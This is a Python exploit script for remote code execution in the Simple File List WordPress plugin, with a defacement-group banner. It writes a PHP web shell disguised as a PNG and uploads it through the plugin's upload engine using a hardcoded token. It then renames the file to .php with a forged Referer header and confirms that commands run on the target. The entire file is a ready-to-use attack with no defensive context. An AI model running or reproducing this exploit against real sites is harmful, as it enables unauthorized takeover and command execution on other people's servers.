WordPress Simple File List -RCE

1. import requests
2. import random
3. import hashlib
4. import sys
5. import os
6. import urllib3
7. urllib3.disable_warnings()
8.  
9. dir_path = '/wp-content/uploads/simple-file-list/'
10. upload_path = '/wp-content/plugins/simple-file-list/ee-upload-engine.php'
11. move_path = '/wp-content/plugins/simple-file-list/ee-file-engine.php'
12.  
13.  
14. def usage():
15.     banner = """
16. ===============================    
17. Usage : python exploit.py <URL>
18. Author: coiffeur
19. Recoded : Crusher.
20. Facebook : fb.com/crusher.gov
21. Site : www.DestroySquad.Com
22. ===============================
23.    """
24.     print(banner)
25.  
26.  
27. def generate():
28.     filename = f'{random.randint(0, 10000)}.png'
29.     password = hashlib.md5(bytearray(random.getrandbits(8)
30.                                      for _ in range(20))).hexdigest()
31.     with open(f'{filename}', 'wb') as f:
32.         payload = '<?php echo system($_GET["cmd"]);?>'
33.         f.write(payload.encode())
34.     print(f'[+] File {filename} generated with password: {password}')
35.     return filename, password
36.  
37.  
38. def upload(url, filename):
39.     files = {'file': (filename, open(filename, 'rb'), 'image/png')}
40.     datas = {'eeSFL_ID': 1, 'eeSFL_FileUploadDir': dir_path,
41.              'eeSFL_Timestamp': 1587258885, 'eeSFL_Token': 'ba288252629a5399759b6fde1e205bc2'}
42.     r = requests.post(url=f'{url}{upload_path}',
43.                       data=datas, files=files, verify=False)
44.     r = requests.get(url=f'{url}{dir_path}{filename}', verify=False)
45.     if r.status_code == 200:
46.         print(f'[ ] KeUpload Nih {url}{dir_path}{filename}')
47.         os.remove(filename)
48.     else:
49.         print(f'[*] Gagal Upload Bos{filename}')
50.         exit(-1)
51.     return filename
52.  
53.  
54. def move(url, filename):
55.     new_filename = f'{filename.split(".")[0]}.php'
56.     headers = {'Referer': f'{url}/wp-admin/admin.php?page=ee-simple-file-list&tab=file_list&eeListID=1',
57.                'X-Requested-With': 'XMLHttpRequest'}
58.     datas = {'eeSFL_ID': 1, 'eeFileOld': filename,
59.              'eeListFolder': '/', 'eeFileAction': f'Rename|{new_filename}'}
60.     r = requests.post(url=f'{url}{move_path}',
61.                       data=datas, headers=headers, verify=False)
62.     if r.status_code == 200:
63.         print(f'[ ] Nih Shell nya {url}{dir_path}{new_filename}')
64.     else:
65.         print(f'[*] Failed to move {filename}')
66.         exit(-1)
67.     return new_filename
68.  
69.  
70. def main(url):
71.     file_to_upload, password = generate()
72.     uploaded_file = upload(url, file_to_upload)
73.     moved_file = move(url, uploaded_file)
74.     if moved_file:
75.         print(f'[+] Mantep..\n[*] Got Hacked...')
76.  
77.     datas = {'password': password, 'cmd': 'phpinfo();'}
78.     r = requests.post(url=f'{url}{dir_path}{moved_file}',
79.                       data=datas, verify=False)
80.     if r.status_code == 200 and r.text.find('php') != -1:
81.         print('[+] Exploit work !')
82.         print(f'\tURL: {url}{dir_path}{moved_file}')
83.         print(f'\tPassword: {password}')
84.  
85.  
86. if __name__ == "__main__":
87.     if (len(sys.argv) < 2):
88.         usage()
89.         exit(-1)
90.  
91.     main(sys.argv[1])